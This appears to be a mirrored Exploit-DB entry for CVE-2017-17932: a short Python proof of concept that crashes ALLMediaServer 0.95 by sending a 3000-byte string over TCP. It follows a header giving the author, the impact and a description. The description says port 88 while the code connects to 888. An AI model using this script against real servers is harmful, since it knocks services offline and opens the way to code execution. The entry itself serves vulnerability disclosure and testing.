exploit-db-mirror/exploits/windows/dos/43406.py
Offensive Security be0fb79789 DB: 2017-12-29
2 changes to exploits/shellcodes

ALLMediaServer 0.95 - Buffer Overflow
ALLMediaServer 0.95 - Buffer Overflow (PoC)

ALLMediaServer 0.95 - Buffer Overflow (Metasploit)

DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download
DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)
2017-12-29 05:02:21 +00:00

44 lines
No EOL
1.2 KiB
Python
Executable file

# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service
#1. Description
#
#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
#
#
#2. Proof of Concept
#
#!/usr/bin/python
#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work.
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.205.131', 888))
buffer = "A" * 3000
s.send(buffer)
s.close()
if __name__ == '__main__':
import socket
main()